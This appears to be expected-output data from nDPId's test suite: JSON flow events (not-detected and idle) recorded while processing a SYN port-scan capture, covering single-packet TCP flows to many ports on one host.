-00580{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1976,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275061415,"flow_last_seen":1278275061415,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":5269,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00595{"flow_event_id":8,"flow_event_name":"not-detected","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1428,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275060641,"flow_last_seen":1278275060641,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":3221,"l4_proto":"tcp","ndpi": {"proto":"Unknown","breed":"Unrated"}} -00580{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1428,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275060641,"flow_last_seen":1278275060641,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":3221,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 
-00595{"flow_event_id":8,"flow_event_name":"not-detected","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1020,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275060066,"flow_last_seen":1278275060066,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":1174,"l4_proto":"tcp","ndpi": {"proto":"Unknown","breed":"Unrated"}} -00580{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1020,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275060066,"flow_last_seen":1278275060066,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":1174,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00595{"flow_event_id":8,"flow_event_name":"not-detected","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1180,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275060287,"flow_last_seen":1278275060287,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":1175,"l4_proto":"tcp","ndpi": {"proto":"Unknown","breed":"Unrated"}} 
-00580{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1180,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275060287,"flow_last_seen":1278275060287,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":1175,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00595{"flow_event_id":8,"flow_event_name":"not-detected","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1085,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275060176,"flow_last_seen":1278275060176,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":1174,"l4_proto":"tcp","ndpi": {"proto":"Unknown","breed":"Unrated"}} -00580{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1085,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275060176,"flow_last_seen":1278275060176,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":1174,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 
-00595{"flow_event_id":8,"flow_event_name":"not-detected","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1227,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275060387,"flow_last_seen":1278275060387,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":1175,"l4_proto":"tcp","ndpi": {"proto":"Unknown","breed":"Unrated"}} -00580{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1227,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275060387,"flow_last_seen":1278275060387,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":1175,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00594{"flow_event_id":8,"flow_event_name":"not-detected","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":252,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275058471,"flow_last_seen":1278275058471,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":1183,"l4_proto":"tcp","ndpi": {"proto":"Unknown","breed":"Unrated"}} 
-00579{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":252,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275058471,"flow_last_seen":1278275058471,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":1183,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00594{"flow_event_id":8,"flow_event_name":"not-detected","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":835,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275059785,"flow_last_seen":1278275059785,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":5280,"l4_proto":"tcp","ndpi": {"proto":"Unknown","breed":"Unrated"}} -00579{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":835,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275059785,"flow_last_seen":1278275059785,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":5280,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 
-00594{"flow_event_id":8,"flow_event_name":"not-detected","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":286,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275058595,"flow_last_seen":1278275058595,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":1183,"l4_proto":"tcp","ndpi": {"proto":"Unknown","breed":"Unrated"}} -00579{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":286,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275058595,"flow_last_seen":1278275058595,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":1183,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00594{"flow_event_id":8,"flow_event_name":"not-detected","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":912,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275059896,"flow_last_seen":1278275059896,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":5280,"l4_proto":"tcp","ndpi": {"proto":"Unknown","breed":"Unrated"}} 
-00579{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":912,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275059896,"flow_last_seen":1278275059896,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":5280,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00594{"flow_event_id":8,"flow_event_name":"not-detected","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":566,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275059409,"flow_last_seen":1278275059409,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":1185,"l4_proto":"tcp","ndpi": {"proto":"Unknown","breed":"Unrated"}} -00579{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":566,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275059409,"flow_last_seen":1278275059409,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":1185,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 
-00594{"flow_event_id":8,"flow_event_name":"not-detected","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":949,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275059956,"flow_last_seen":1278275059956,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":1186,"l4_proto":"tcp","ndpi": {"proto":"Unknown","breed":"Unrated"}} -00579{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":949,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275059956,"flow_last_seen":1278275059956,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":1186,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00594{"flow_event_id":8,"flow_event_name":"not-detected","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":654,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275059518,"flow_last_seen":1278275059518,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":1185,"l4_proto":"tcp","ndpi": {"proto":"Unknown","breed":"Unrated"}} 
-00579{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":654,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275059518,"flow_last_seen":1278275059518,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":1185,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00595{"flow_event_id":8,"flow_event_name":"not-detected","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1006,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275060065,"flow_last_seen":1278275060065,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":1186,"l4_proto":"tcp","ndpi": {"proto":"Unknown","breed":"Unrated"}} -00580{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1006,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275060065,"flow_last_seen":1278275060065,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":1186,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 
-00594{"flow_event_id":8,"flow_event_name":"not-detected","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":127,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275058096,"flow_last_seen":1278275058096,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":1187,"l4_proto":"tcp","ndpi": {"proto":"Unknown","breed":"Unrated"}} -00579{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":127,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275058096,"flow_last_seen":1278275058096,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":1187,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00594{"flow_event_id":8,"flow_event_name":"not-detected","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":165,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275058220,"flow_last_seen":1278275058220,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":1187,"l4_proto":"tcp","ndpi": {"proto":"Unknown","breed":"Unrated"}} 
-00579{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":165,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275058220,"flow_last_seen":1278275058220,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":1187,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00595{"flow_event_id":8,"flow_event_name":"not-detected","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":952,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275059957,"flow_last_seen":1278275059957,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":64680,"l4_proto":"tcp","ndpi": {"proto":"Unknown","breed":"Unrated"}} -00580{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":952,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275059957,"flow_last_seen":1278275059957,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":64680,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 
-00594{"flow_event_id":8,"flow_event_name":"not-detected","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":874,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275059846,"flow_last_seen":1278275059846,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":1192,"l4_proto":"tcp","ndpi": {"proto":"Unknown","breed":"Unrated"}} -00579{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":874,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275059846,"flow_last_seen":1278275059846,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":1192,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00596{"flow_event_id":8,"flow_event_name":"not-detected","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1003,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275060065,"flow_last_seen":1278275060065,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":64680,"l4_proto":"tcp","ndpi": {"proto":"Unknown","breed":"Unrated"}} 
-00581{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1003,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275060065,"flow_last_seen":1278275060065,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":64680,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00594{"flow_event_id":8,"flow_event_name":"not-detected","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":931,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275059955,"flow_last_seen":1278275059955,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":1192,"l4_proto":"tcp","ndpi": {"proto":"Unknown","breed":"Unrated"}} -00579{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":931,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275059955,"flow_last_seen":1278275059955,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":1192,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 
-00595{"flow_event_id":8,"flow_event_name":"not-detected","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1782,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275061108,"flow_last_seen":1278275061108,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":1198,"l4_proto":"tcp","ndpi": {"proto":"Unknown","breed":"Unrated"}} -00580{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1782,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275061108,"flow_last_seen":1278275061108,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":1198,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00595{"flow_event_id":8,"flow_event_name":"not-detected","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1875,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275061211,"flow_last_seen":1278275061211,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":1198,"l4_proto":"tcp","ndpi": {"proto":"Unknown","breed":"Unrated"}} 
-00580{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1875,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275061211,"flow_last_seen":1278275061211,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":1198,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00594{"flow_event_id":8,"flow_event_name":"not-detected","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":718,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275059626,"flow_last_seen":1278275059626,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":1199,"l4_proto":"tcp","ndpi": {"proto":"Unknown","breed":"Unrated"}} -00579{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":718,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275059626,"flow_last_seen":1278275059626,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":1199,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 
-00594{"flow_event_id":8,"flow_event_name":"not-detected","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":787,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275059736,"flow_last_seen":1278275059736,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":1199,"l4_proto":"tcp","ndpi": {"proto":"Unknown","breed":"Unrated"}} -00579{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":787,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275059736,"flow_last_seen":1278275059736,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":1199,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 